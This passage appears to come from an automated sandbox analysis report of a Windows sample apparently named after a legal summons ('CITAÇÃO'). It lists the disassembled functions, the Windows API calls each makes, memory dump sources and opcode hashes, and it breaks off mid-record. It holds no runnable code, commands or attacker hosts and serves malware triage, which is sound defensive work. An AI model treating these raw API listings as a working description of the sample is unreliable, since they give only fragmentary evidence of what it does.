                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                      • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                      • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                      • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                      APIs
                                                      • SendMessageW.USER32 ref: 004555C7
                                                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                      • DeleteObject.GDI32(?), ref: 00455736
                                                      • DeleteObject.GDI32(?), ref: 00455744
                                                      • DestroyIcon.USER32(?), ref: 00455752
                                                      • DestroyWindow.USER32(?), ref: 00455760
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                      • String ID:
                                                      • API String ID: 3691411573-0
                                                      • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                      • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                      • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                      • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                      APIs
                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                      • LineTo.GDI32(?,?,?), ref: 004472AC
                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                      • LineTo.GDI32(?,?,?), ref: 004472C6
                                                      • EndPath.GDI32(?), ref: 004472D6
                                                      • StrokePath.GDI32(?), ref: 004472E4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                      • String ID:
                                                      • API String ID: 372113273-0
                                                      • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                      • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                      • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                      • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0044CC6D
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                      • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                      • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                      • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                      APIs
                                                      • __getptd.LIBCMT ref: 0041708E
                                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                      • __amsg_exit.LIBCMT ref: 004170AE
                                                      • __lock.LIBCMT ref: 004170BE
                                                      • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                      • _free.LIBCMT ref: 004170EE
                                                      • InterlockedIncrement.KERNEL32(00A62CE8), ref: 00417106
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                      • String ID:
                                                      • API String ID: 3470314060-0
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                        • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      APIs
                                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                      • ExitThread.KERNEL32 ref: 004151ED
                                                      • __freefls@4.LIBCMT ref: 00415209
                                                      Similarity
                                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                      • String ID:
                                                      • API String ID: 442100245-0
                                                      APIs
                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                      • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                      • _wcslen.LIBCMT ref: 0045F94A
                                                      • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                      Strings
                                                      Similarity
                                                      • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 621800784-4108050209
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • SetErrorMode.KERNEL32 ref: 004781CE
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                      • SetErrorMode.KERNEL32(?), ref: 00478270
                                                      • SetErrorMode.KERNEL32(?), ref: 00478340
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                      • String ID: \VH
                                                      • API String ID: 3884216118-234962358
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                      • IsMenu.USER32(?), ref: 0044854D
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                      • DrawMenuBar.USER32 ref: 004485AF
                                                      Strings
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert
                                                      • String ID: 0
                                                      • API String ID: 3076010158-4108050209
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                      • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$_memmove_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1589278365-1403004172
                                                      Similarity
                                                      • API ID: Handle
                                                      • String ID: nul
                                                      • API String ID: 2519475695-2873401336
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                      Strings
                                                      Similarity
                                                      • API ID: Handle
                                                      • String ID: nul
                                                      • API String ID: 2519475695-2873401336
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: SysAnimate32
                                                      • API String ID: 0-1011021900
                                                      • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                      • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                      • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                      • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                      APIs
                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                        • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                        • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                        • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                      • GetFocus.USER32 ref: 0046157B
                                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                        • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                      • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                      • __swprintf.LIBCMT ref: 00461608
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                      • String ID: %s%d
                                                      • API String ID: 2645982514-1110647743
                                                      • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                      • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                      • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                      • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                      • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                      • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                      • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                      • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                      • String ID:
                                                      • API String ID: 3488606520-0
                                                      • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                      • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                      • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                      • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ConnectRegistry_memmove_wcslen
                                                      • String ID:
                                                      • API String ID: 15295421-0
                                                      • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                      • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                      • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                      • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                      • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                      • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Library$FreeLoad
                                                      • String ID:
                                                      • API String ID: 2449869053-0
                                                      • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                      • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                      • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                      • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 004563A6
                                                      • ScreenToClient.USER32(?,?), ref: 004563C3
                                                      • GetAsyncKeyState.USER32(?), ref: 00456400
                                                      • GetAsyncKeyState.USER32(?), ref: 00456410
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorLongScreenWindow
                                                      • String ID:
                                                      • API String ID: 3539004672-0
                                                      • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                      • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                      • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                      • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                      APIs
                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                      • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                                      • String ID:
                                                      • API String ID: 327565842-0
                                                      • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                      • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                      • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                      • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                       • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmp
